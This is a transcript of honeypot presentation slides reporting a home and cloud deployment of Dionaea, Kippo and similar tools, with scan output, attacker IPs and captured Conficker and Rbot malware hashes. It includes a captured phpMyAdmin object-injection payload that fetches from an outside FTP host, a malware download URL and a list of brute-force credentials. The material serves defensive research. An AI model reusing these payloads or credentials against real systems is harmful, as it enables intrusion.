honeypots - november 8th misec presentation
DESCRIPTION
5 additional addendum pages added.TRANSCRIPT
- 1.Honeypots
2. Agenda About me What is a honeypot? Different kinds of honeypots Honeypots I used Different data I discovered 3. About me Husband Father Geek Gets distracted by shinyobjects easy Breaker/Fixer of things 4. This is not a honeypot. 5. Lance Spitzners definition of honeypots isas follows... A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003) 6. Open source Argos HIHAT (High Interaction Honeypot AnalysisToolkit) Capture-HPC Honeywall Sebek (kernel module) QebekCommercial Windows XP SP0 Windows Vista SP0 7. Kippo 8. Open source nepenthes Kojoney dionaea Amun Glastopf SAFER Honeypot Google Hack Honeypot (Spoofing Active HoneyC Fingerprints w/ Honeyd Enhanced Replies) ThugCommercial Specter KFSensor Honeypoint 9. Clean-net Wife and sons laptops Dirty-net My desktop ?? Honeybook 10. Medium interaction Kippo Low interaction Amun Glastopf Dionaea Local To the cloud 11. Port AmunNepenthes Dionaea21 ftpdftp25 imail42 winswins69 tftp80 httpasn1http105mercury110axigen, slmail, mdaemon135dcomdcomepmap139smb, ms06040, netddenetbiosname, netdde143lotusdomino 12. Port AmunNepenthes Dionaea443iis iis https lsass, pnp, dnsv2, asn1,asn1, dcom, lsass,445ms06070, ms08067, smbms08067, pnp smb554helix587imail617arkeia1023 sasserftpdsasserftpd1025 msdtc dcom, msdtc1080 mydoom1111 tivoli1433 mssql 13. Port Amun Nepenthes Dionaea1434mssql1581 tivoli1900 arc2101 msmq2103 msmq msmq2105 msmq msmq2107 msmq msmq2380 goodtech2555 upnp2745 baglebagle 14. Port Amun Nepenthes Dionaea2954 hpopenview2967 symantec symantec2968 symantec symantec3127 mydoom mydoom3128 mydoom3140optix3268 trend3306mysql3372 msdtcmsdtc3628 trend 15. Port Amun NepenthesDionaea5000 upnp upnp5060 sip5168 trend5554 sasserftpd sasserftpd6070 arc6101 veritas6129 dameware dameware7144 peercast8080 tivoli9999 maxdb 16. A low-interaction honeypot Emulates a wide range of differentvulnerabilities. Payload transmitted by the attacker isanalyzed Any download URL found is extracted. Next, the honeypot tries to download themalicious software and store it on thelocal hard disc, for further analyses. 17. A web application honeypot Web server written in Python Popular attack type emulationalready in place Remote file inclusion Local file inclusion HTML injection via POST requests SQL injection emulation 18. Medium interaction SSH honeypot Designed to log brute force attacksand, most importantly, the entireshell interaction performed by theattacker. Has a fake file system you canread/write to. You can add additional commands 19. To catch bugs meant to be a nepenthessuccessor Python embedded can detect shellcodes supports ipv6 and tls. A VoIP module has beendeveloped as part of GSoc2011 20. # Nmap 6.01 scan initiated Wed Jul 25 21:46:59 2012 as: nmap -A -oN/root/Desktop/dionaea_off.txt 192.168.1.197Nmap scan report for lp (192.168.1.197)Host is up (0.00075s latency).All 1000 scanned ports on lp (192.168.1.197) are closedMAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)Too many fingerprints match this host to give specific OS detailsNetwork Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.75 ms lp (192.168.1.197)OS and Service detection performed. Please report any incorrect results athttp://nmap.org/submit/ .# Nmap done at Wed Jul 25 21:47:01 2012 -- 1 IP address (1 host up)scanned in 2.28 seconds 21. # Nmap 6.01 scan initiated Wed Jul 25 21:47:16 2012 as: nmap -A -oN /root/Desktop/dionaea_on.txt 192.168.1.197Nmap scan report for lp (192.168.1.197)Host is up (0.00087s latency).Not shown: 990 closed portsPORT STATE SERVICEVERSION21/tcp open ftp Dionaea honeypot ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230)42/tcp open tcpwrapped80/tcp open http?|_http-title: Directory listing for /135/tcp open msrpc?443/tcp open ssl/https?|_http-title: Directory listing for /| ssl-cert: Subject: commonName=Nepenthes DevelopmentTeam/organizationName=dionaea.carnivore.it/countryName=DE| Not valid before: 2012-07-26 01:47:37|_Not valid after: 2013-07-26 01:47:37445/tcp open microsoft-ds Dionaea honeypot smbd1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server3306/tcp open mysql MySQL 5.0.54| mysql-info: Protocol: 10| Version: 5.0.54| Thread ID: 1729232896| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection| Status: Autocommit|_Salt: aaaaaaaa 5060/tcp open sip (SIP end point; Status: 200 OK)5061/tcp open ssl/sip (SIP end point; Status: 200 OK)| ssl-cert: Subject: commonName=Nepenthes DevelopmentTeam/organizationName=dionaea.carnivore.it/countryName=DE| Not valid before: 2012-07-26 01:47:37|_Not valid after:2013-07-26 01:47:374 services unrecognized despite returning data.MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)Device type: general purposeRunning: Linux 2.6.X|3.XOSCPE: cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3OS details: Linux 2.6.38 - 3.2Network Distance: 1 hopHost scriptresults:|_nbstat: NetBIOS name: LP, NetBIOS user: , NetBIOS MAC: |_smbv2-enabled: Serverdoesnt support SMBv2 protocol| smb-security-mode: | Account that was used for smb scripts: guest| User-levelauthentication| SMB Security: Challenge/response passwords supported|_ Message signing disabled (dangerous, butdefault)| smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager)| NetBIOS computer name: HOMEUSER- 22. 14 pcap files, total of 102 Meg 129 replay files 4 Meg 2 log files Error log Activity log 2 SQLite database files Logsqlite Activity log but in SQLite format Sipaccounts 1 malicious executable 23. Day 1 44 Unique IP addresses Time it took to get connections 14 minutesDay 2 xx Unique IP addresses Time it took to get connections - Malicious file uploaded Never live with the results of one tool,always use multiple tools!! 24. TCPPortOccurrencesProtocol Occurrence23 46Telnet IP address s22 42SSH 184.171.169.60 698040 HTTP 74.63.195.9019108038SOCKS Proxy184.164.150.139 13534DCE Endpoint 64.31.14.106573 26NETRJS101.78.154.1234 80820 Net.TCP Port Sharing118.122.188.96325 15 SMTP12.134.192.583 993 14IMAPS175.16.97.1643110 11POP3 178.95.22.152 3 139 9NetBIOS 184.52.56.26 31 8 TCPMUX199.188.104.83 3 21 6 FTP 211.147.3.19 3796Finger 221.2.209.46 3 1435 IMAP64.31.29.623 5875 SMTP (Email message submission) 71.99.147.51 3 9955POP3 over TLS/SSL 117.27.137.48 210965?? 120.151.204.1062434WHOIS121.52.71.1152 81 4 Torpack Onion routing14.102.115.51 2199.19.94.85 2 25. 184.171.169.60http://www.securedservers.com/index.php 26. 184.171.169.60http://www.securedservers.com/index.php 27. 74.63.195.90 http://limestonenetworks.com/ 28. OccurrenceOSsLinkOccurrencesLinux14ethernet/modem54Windows 30 IPv6/IPIP 3Solaris1 pppoe (DSL) 15 sometimes DSL (3) 4OS version - Windows OS version - LinuxXP/2000 (RFC1323+, w+, tstamp-) 22.6 (newer, 1)1XP SP1+, 2000 SP33 2.6 (newer, 2)22000 SP4, XP SP1+222.6 (newer, 3)4 2.6, seldom 2.4 (older,2000 SP2+, XP SP1+ (seldom 98) 3 2)5 2.6, seldom 2.4 (older, 4)2 29. Day 1Goals Get the honeypot installed and up and running Get some traffic Run some packet capturesTimeline1. 2:55 pm1. Started dionaea2. I immediately run an nmap scan and it just lit up like a Christmas tree.3. That accounts for 1053 connection attempts.4. 6:44pm - Started wireshark packet capture2. 3:07 - the first attacker appears (me)1. 6:58 - the first connection appears 30. Day 2Goals Start saving packet captures (with no arp on the capturefilter) Get some traffic Catch some malware?Timeline1. 11:12:04am 1. Get a connection from 69.57.27.138 2. Attempts connection to TCP port 135 (epmap). It gets a SYN, ACK.2. 11:12:06 am 1. Tftp session is initiated and malware is being dropped on system3. 11:12:42 am 1. Tftp session completes4. 14:39:47 am 1. Hes back! (Process from 1.1 starts all over again) 31. MD5 - aff643a5014a9d8e98b24fa4dac11623 Virus Total 40/42 detection ratio Rbot ThreatExpertA malicious backdoor trojan that runs in thebackground and allows remote access to thecompromised system A network-aware worm that attempts toreplicate across the existing network(s) 32. IP Address and Domain Information Chrome extension (from TCPIPUtils.OrgNameAlgona Municipal UtilitiesOrgIdAMU-6Address104 West Call StreetAddressPO Box 10City AlgonaStateProvIAPostalCode 50511CountryUSRegDate1/20/2011Updated 7/6/2011 http://www.netamu.com/ 33. Goals To the cloud! 34. Round 2Amazon EC2 Ubuntu 12.04 Microinstance Virginia Oregon San Paolo, South America Ireland Toyko (Thanks Sukotto_san!)Unable to do Singapore 35. Virginia 3 files Oregon 0 files South America 1 file Toyko 1 file Ireland 40 files!! 36. Virginia 7a5acd7da5a5d7845a4bcd1a90019e69 VirusTotal 40/44 W32/Conficker.worm.gen.a - Mcafee 607a710f446de466fcb3be1e5c189c71 VirusTotal 42/44 VirScan.org File name - azsvf.nmg 344770974dce3c039b48d27bd4e9a114 VirusTotal 41/42 W32/Conficker.worm Mcafee ThreatExpert link -http://www.threatexpert.com/report.aspx?md5=344770974dce3c039b48d27bd4e9a114 37. OccurrenceIP Address OccurrencesTCP PortsProtocol175.23.26.55 1161.147.103.857144320 MSSQL Server211.22.54.1473Microsoft-DS Active42.121.84.1872Directory, Windows31.13.232.59 2445 6shares182.1.23.144 2NetBIOS NetBIOS173.163.222.2211392 Session Service211.22.54.145 1 Microsoft Terminal 3389 1Server (RDP) 38. 175.23.26.55Port 1433http://www.chinaunicom.com.hk/en/home/default.html 39. 61.147.103.85Port 1433http://en.chinatelecom.com.cn/ 40. 7a5acd7da5a5d7845a4bcd1a90019e69 - Net-Worm.Win32.Kido.ih 41. 344770974dce3c039b48d27bd4e9a114 - Net-Worm.Win32.Kido.ih http://www.telkomsel.com 42. 344770974dce3c039b48d27bd4e9a114 43. 607a710f446de466fcb3be1e5c189c71http://www.hinet.net/ 44. 607a710f446de466fcb3be1e5c189c71 45. South America 1 file 0139abdd353ca804aa654c8db556dc46 VirusTotal 32/41 Kaspersky -Trojan.Win32.Jorik.IRCbot.qrq 46. 0139abdd353ca804aa654c8db556dc46 47. Toyko 2 files 933be7b1b0077563f639a99d131bde7f From: http://esendfile.com/xx81.exe File name: xx81.exe Analysis date: 2012-11-02 23:08:50 UTC VirusTotal 33/44 Kaspersky - Trojan-Dropper.Win32.Injector.fyym Microsoft -VirTool:Win32/CeeInject.gen!IJ Sophos - Troj/ProcInj-N csrss.exe From: smb://87.241.82.99 (Didnt save) 48. 87.241.82.99 49. TCPPort Occurances Protocol 3306 909MySQL database system17681?? 143349MSSQL Server3435438?? 338934Microsoft Terminal Server (RDP)80 31 Hypertext Transfer Protocol (HTTP)11018Post Office Protocol v3 (POP3)44518Microsoft-DS Active Directory, Windows shares 2513Simple Mail Transfer Protocol (SMTP)139 11 NetBIOS NetBIOS Session Service 239Telnet protocolMicrosoft EPMAP (End Point Mapper), also known 135 6as DCE/RPC Locator service,[14] used to remotely manage services including DHCP server, DNSserver and WINS. Also used by DCOM 50. IP address Occurrences66.225.253.122273119.1.96.68 19258.211.69.182 17961.160.200.4699210.195.52.981183.136.144.36 78202.165.179.1183837.46.112.145 3158.16.63.214 30201.116.201.24828121.245.220.21424165.225.128.229 18 51. 66.225.253.122Port 3306http://www.servercentral.com/ 52. 119.1.96.68Port 3306http://www.chinanet.com 53. Ireland 40 files VirusTotal results Kaspersky Microsoft Sophos This was from a time frame spanning between 54. DetectionFile name (MD5)ratio:Analysis date:Kaspersky MicrosoftSophos8aefa2d9f0a6cf4d70ecc484 2011-06-25 22:20:53a953c007 37 / 42 UTC Net-Worm.Win32.Kido.ihWorm:Win32/Conficker.B Mal/Conficker-A7c3c59692a7d4c4f53187a42011-09-13 20:56:07284bc53df 40 / 44UTC Net-Worm.Win32.Kido.ihWorm:Win32/Conficker.B Mal/Conficker-A6dd2d5993d634aeab90682 2011-12-07 07:00:30ad2e59376f 38 / 43 UTC Net-Worm.Win32.Kido.ihWorm:Win32/Conficker.B Mal/Conficker-Adeaf1f22c26f974a7977ba56 2012-08-05 02:50:4178e159a9 36 / 41 UTC Net-Worm.Win32.Kido.ihWorm:Win32/Conficker.C Mal/Conficker-A4d2694b90c3fb8e6f9116c22012-08-28 05:32:100e8cbfa91 38 / 41UTC Net-Worm.Win32.Kido.ihWorm:Win32/Conficker.B Mal/Conficker-A9abd8f29a3d24c1c6c322602012-09-22 16:47:01e8493ac43 29 / 31UTC Backdoor.Win32.Rbot.bqj n/an/a0c059b0d1d5a03f69a211852012-11-05 05:32:43987c17d5c 42 / 44UTC Net-Worm.Win32.Kido.ihWorm:Win32/Conficker.C Mal/Conficker-A0d8478eec0a3d9632e7d7c 2012-11-05 05:32:52d432f7ee09 41 / 44 UTC Backdoor.Win32.Rbot.bqj Backdoor:Win32/RbotW32/Rbot-Gen16ebc1c90231a9e78ed1ed 2012-11-05 05:33:29e0a58e58cb 18 / 21 UTC n/a n/aMal/Conficker-A2aeae56802c4efc7b68e8e12012-11-05 05:35:09f6b04edea 41 / 44UTC Net-Worm.Win32.Kido.ihWorm:Win32/Conficker.B Mal/Conficker-A 55. DetectionFile name (MD5)ratio:Analysis date:KasperskyMicrosoft Sophos2e8da5a55865a091864a4338ef4dWorm:Win32/Conficker.C Mal/Conficker-2e44 42 / 44 2012-11-05 05:35:26 UTC Net-Worm.Win32.Kido.ihA344770974dce3c039b48d27bd4e9 Mal/Conficker-a114 42 / 44 2012-11-05 05:35:49 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A3d17d15d86c34874039e77341aab Mal/Conficker-b1c4 41 / 44 2012-11-05 05:36:33 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A3f46687b1f8d403b901e46a37045 Mal/Conficker-08ea 42 / 44 2012-11-05 05:36:46 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A4934ddd5bdfa5635f946667d66c83Trojan.Win32.Genome.mMal/Conficker-4b6 41 / 432012-11-05 05:37:25 UTC voq Worm:Win32/Conficker.B A4fbcfb9557656c96edb479e30eef2f Mal/Conficker-b3 43 / 44 2012-11-05 05:38:02 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A574cf0062911c8c4eca2156187b8 Mal/Conficker-207d 42 / 44 2012-11-05 05:38:35 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A58a4a4bbba4d75dbc6c6c7c9b439 Mal/Conficker-955d 39 / 43 2012-11-05 05:38:39 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A59fe65fad4849c95ed538475c1f70Trojan.Win32.Genome.wjMal/Conficker-7cf 42 / 442012-11-05 05:38:51 UTC uk Worm:Win32/Conficker.C A5cd426dbec0619b9500a96f24b38 Mal/Conficker-86c8 41 / 44 2012-11-05 05:39:05 UTC Net-Worm.Win32.Kido.ks Worm:Win32/Conficker.B A6ce65eea05ae7fc659a455b5e158 Mal/Conficker-9ab0 40 / 43 2012-11-05 05:40:44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A 56. DetectionFile name (MD5) ratio:Analysis date:KasperskyMicrosoftSophos78c9042bbcefd65beaa0d40386da2012-11-05 05:41:289f89 39 / 40UTC n/aWorm:Win32/Conficker.C Mal/Conficker-A7bb455ea4a77b24478fba4de145 2012-11-05 05:41:45115eb 40 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A94e689d7d6bc7c769d09a590667 2012-11-05 05:43:4227497 42 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A961cfb405f6aa100bf6a3d66507ed 2012-11-05 05:43:54a18 41 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A9c09418c738e265a27e6c599f43d2012-11-05 05:44:1986ab 43 / 44UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Aa312c8b1adb48a60b0f755a5711b2012-11-05 05:44:57 Trojan.Win32.Genome.h8995 43 / 44UTC kck Worm:Win32/Conficker.C Mal/Conficker-Aacf4da36e762084070f8138a43142012-11-05 05:45:494759 43 / 44UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Ab081022fc581decf4c8640dbc74a2012-11-05 05:46:099198 42 / 43UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Abc9d30d59788c70060d7eabd6ab 2012-11-05 05:46:575e663 41 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Abdc18dfcfa63861aaa9d9fb95919d 2012-11-05 05:47:0132a 42 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A 57. DetectionFile name (MD5) ratio:Analysis date:KasperskyMicrosoftSophosc7277972654775258bf3d4d6936eb 2012-11-05 05:48:00Worm:Win32/Conficker Mal/Conficker-1b0 41 / 44 UTC Net-Worm.Win32.Kido.ih .B Acae4b7963f5e43033664299a4d5bd 2012-11-05 05:48:11Worm:Win32/Conficker Mal/Conficker-176 43 / 44 UTC Net-Worm.Win32.Kido.ih .B Ad45895e3980c96b077cb4ed8dc163 2012-11-05 05:48:48Worm:Win32/Conficker Mal/Conficker-db8 43 / 44 UTC Trojan.Win32.Genome.taql .C Ad90b4a84515f3a4d7d4ca716d9263 2012-11-05 05:49:11Worm:Win32/Conficker Mal/Conficker-a5e 42 / 44 UTC Net-Worm.Win32.Kido.ih .B Ae1855fbe6cf64738bffb9dc195e38ed 2012-11-05 05:49:46Worm:Win32/Conficker Mal/Conficker-1 41 / 44 UTC Net-Worm.Win32.Kido.ih .B Ae53ed987e82ad7bf076c23d91401c 2012-11-05 05:50:05Worm:Win32/Conficker Mal/Conficker-ac7 42 / 44 UTC Net-Worm.Win32.Kido.ih .B Aef87b673c8e3b77bdf2342e42e1b5f2012-11-05 05:50:49 Net- Worm:Win32/Conficker Mal/Conficker-0c 43 / 44UTC Worm.Win32.Kido.dam.ba .C Afb34cb2d017899592aa1c8d578bfa42012-11-05 05:51:36Worm:Win32/Conficker Mal/Conficker-55 41 / 44UTC Net-Worm.Win32.Kido.ih .B Ad41d8cd98f00b204e9800998ecf8422012-11-05 16:11:317e 0 / 42 UTC --- 58. TCP Port OccurrencesProtocol 3306205MySQL database system1433 173MSSQL Server 445154Microsoft-DS Active Directory, Windows shares5060 45 Session Initiation Protocol (SIP)139 38NetBIOS NetBIOS Session Service 80 32Hypertext Transfer Protocol (HTTP) 338913Microsoft Terminal Server (RDP) 1080 11 SOCKS proxy135 6 DCE endpoint resolution90975 ??233 Telnet protocol 1103 Post Office Protocol v3 (POP3) 59. IP addressOccurrencesGeoIP locationInteresting notes TCPIPUtils.com 1 of 4 spam databases 48 different websites near this IP61.147.103.137 147Beijing, Beijing, China (CN)Gaza, Palestinian Territory188.161.92.15344(PS) TCPIPUtils.com 1 of 4 spam databases42.121.19.8427 Hangzhou, Zhejiang, China (CN) TCPIPUtils.com 1 of 4 spam databases203.162.35.88 23Vietnam (VN)125.65.108.65 16 Chengdu, Sichuan, China (CN)68 different websites near this IPBuenos Aires, Distrito181.0.218.144 16Federal, Argentina (AR) 26 different websites near this IP65.18.174.167 16Near Wichita, KS including datemarriedwomen.org Same website where malware from111.249.26.20514 Taipei, Tai-pei, Taiwan (TW) Virginia came from.211.154.213.122 12Beijing, Beijing, China (CN) TCPIPUtils.com 1 of 4 spam databases42.120.0.23812 Hangzhou, Zhejiang, China (CN) So Paulo, Sao Paulo, Brazil TCPIPUtils.com 1 of 4 spam databases187.35.61.105 10(BR) 17 different websites near this IP210.211.117.8110 Vietnam (VN) 60. t1na/t1na pass/pass oscar/oscar luciana/lucianat1na/tina f/f bot/bot volume/volumealexis/alexis roberto/roberto ba/ba boootz/boootzlogic/logic haiduc/haiduc telegest/telegest display/displayart/art rapper/rapper mwyatt/mwyatt red/reda/a vova/vova j/j wolf/wolfdiablo/diablo medina/medina luci/luci m/mdesiree/desiree password/password silvia/silvia vcsa/vcsab/b g/g apocalipsa/apocalipsa dummy/dummyb1ablo/d1ablo kim/kim simbol/simbol maria/mariaslim/slim ionita/ionita boot/boot ion/ionabel/abel raper/raper best/best sah/sahc/c vava/vava ha/ha powered/poweredparadise/paradise passwd/passwd k/k bombastik/bombastikeminem/eminem nicoara/nicoara postgres/postgres good/gooddoris/doris h/h lucian/lucian pink/pinkshortcut/shortcut goncalo/goncalo apocalipse/apocalipse n/nd/d space/space ioana/ioana visa/visaparadisse/paradisse jurca/jurca skin/skin gianluca/gianlucashaggy/shaggy st/st addicted/addicted atb/atbdamian/damian baba/baba bots/bots bus/busadm/adm change/change thebest/thebest melania/melaniae/e slayer/slayer l/l power/powerbaggio/baggio i/i gdm/gdm dudu/duduhaitac/haitac lucia/lucia box/box bela/belarap/rap apoi/apoi maria/maria fantastic/fantasticjean/jean sst/sst ying/yiangbad/bad 61. blue/blue vh/vh putty/putty marian/marianluca/luca yahoo/yahoo ven/ven conterstrike/conterstrikeclaudius/claudius sly/sly cs/cs abo/aboo/o q/q s/s cretu/cretumastercard/mastercard maryjane/maryjane tehnolog/tehnolog ness/nessbuzzz/buzzz buzz/buzz leo/leo123u/ubella/bella mago/mago herbagen/herbagen calcul/calculmumu/mumu lammer/lammer romana/romana cimlinux/cimlinuxmada/mada pasare/pasare caine/caine hacker/hackerskype/skype skywalker/skywalker shoot/shoot anton/antonsybille/sybille sims2/sims2 stat/stat germana/germanabed/bed tim/tim mandi/mandi europa/europap/p discovery/discovery ana/ana slow/slowofficeinn/officeinn hotmail/hostmailambulator/ambulator race/raceterriffic/terriffic vn/vn joc/joc portocala/portocalaroot/password accept/accept conter/conter mark/marksuga/suga marianne/marianne lp/lp v/vmaster/master xman/xman next/next cserv/cservbuz/buz r/r t/t ne/nemadalina/madalina matematica/matematica quatrida/quatrida atai/ataimuie/muie bird/bird gaming/gaming creata/creatainger/inger pisica/pisica zeppelin/zeppelin casa/casaskipe/skipe bang/bang engleza/engleza reebok/reeboksims/sims madi/madi mandarina/mandarina gary/garyqwerty/qwerty lamer/lamer dog/dog tetranet/tetranetamex/amex pix/pix shot/shot rusia/rusiapostgres/postgres sync/sync tara/tara granta/granta 62. smal/smalbanana/bananayes/yesw/wting/tingcretzu/cretzunemesis/nemesisserv/servarpanet/arpanetnee/neecaro/carotax/taxmoscova/moscova 63. Started 10:10pm November 5th Total 229 attempts from a single IPStopped 4:51pm November 6th 64. action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA _Config":1:{s:6:"source";s:45:"ftp://hawk1156:[email protected]/ieh.ic o";}}http://ubuntuforums.org/showthread.php?t=2076978 65. Websites Honeynet Projects - http://www.honeynet.org/ Dionaea - http://dionaea.carnivore.it/ Honeywall - https://projects.honeynet.org/honeywall/ Amun: Python Honeypot - http://amunhoney.sourceforge.net/ Kippo http://code.google.com/p/kippo/ Examples http://blog.macuyiko.com/2011/03/running-ssh-honeypot-with-kippo-lets.html http://www.austinriba.com/2011/10/fun-and-trickery-with-the-kippo-ssh-honeypot/ ShadowServer - http://www.shadowserver.org/ Spiderlabs WASC Distributed Web Honeypots Project -http://blog.spiderlabs.com/2012/02/wasc-distributed-web-honeypots-project-update.html 66. Websites Scumware - http://www.scumware.org/index.scumware VirusTotal - https://www.virustotal.com/ TCPIPUtils - http://www.tcpiputils.com/ (Great Chromeextension)Tools Wireshark Network Miner Netwitness Investigator 67. A host at $IP ($location)tried to log into myhoneypots fake Terminal Services server GET-based RFI attack from $IP ($location) A host at $IP ($location)tried to log into myhoneypots fake MSSQL Server http://inguardians.com/ 68. Keith Dixon@Tazdrumm3r#misec [email protected]://tazdrumm3r.wordpress.com 69. http://hakshop.myshopify.com/products/wifi-pineappleThe Hot-Spot Honeypot Pen-Testing Platform 70. http://securityonion.blogspot.com/ Installing a honeypot? Why not have all the monitoring toolsalready in place? And there are some bad ass tools on this distro. Counting Security Onion is Xubuntu based and all of the honeypotinstalls are based on Lubuntu, I suspect there wont be any issues. I havent tested this to confirm. If you find out otherwise,email me. Id love to know your what you experience. 71. Mercury Live Honeypot DVDftp://ftp.carnivore.it/projects/dionaea/mercury-dvd http://blog.infosanity.co.uk/2010/09/22/mercury-live-honeypot-dvd/Mercury Live DVD was initially (I believe) announced in a post to theNepenthes Mailing list. It is a remastered Ubuntu distribution with pre-installedhoneypot applications and malware analysis tools created by John Moore.From the ReadMe:This live DVD is a remastered version of Ubuntu 10.0 Beta LTS x86_32. It wasdesigned due to my being disappointed with another reverse engineeringmalware live CD that was released recently. I have decided to call my creationMERCURY, which is an acronym for Malware Enumeration, Capture, andReverse Engineering.The Mercury live DVD contains tools used for digital forensics, data recovery,network monitoring, and spoofing. It should primarily be used as a honeypot ornetwork monitoring platform as well as a laboratory and teaching aid. There arethree honeypots installed honeyd, nepenthes, and dionaea. Four, if you 72. Scripts, tools and other lessons learned Amun amun_install.sh Location to grab the file How to set it up Dionaea install_dionaea.sh (Quick and easy setup) install_dionaea_full_monty.sh (previously ran successfully on a Mint12 install) run_dionaea.sh run_p0f_dionaea.sh (In case you want to capture OS information) Glastopf setup_glastopf.sh (Script untested, but ran through steps manuallysuccessfully) Kippo kippo_install.sh (This is one option on installing and running {last lineruns it}) 73. Scripts, tools and other lessons learnedLessons learned Run only one honeypot at a time When running a honeypot from the cloud, test test and retest yourpacket capture script When in doubt, use dumpcap (its been the most successful for me) Adjust the level of logging on dionaea if youre running in the cloud,especially if youre in an extremely active area. Downloading a 4 Gig log file from Ireland was not a quick process First time running dionaea, log everything. Adjust your logging level according to the information you see. If a lot is not useful, dial it back a notch or two. Install on an Ubuntu based system. I tried installing on a Debian based load and ran into dependency issues. The keyboard is small and I want to minimize the time at thekeyboard. ;) I havent tried Fedora or OpenSuSE or BSD based systems. If you do, let me know your results. (See slide # 88 for mycontact info) Take the time to get a good dionaea config file. Getting the malware is good. Automatically submitting to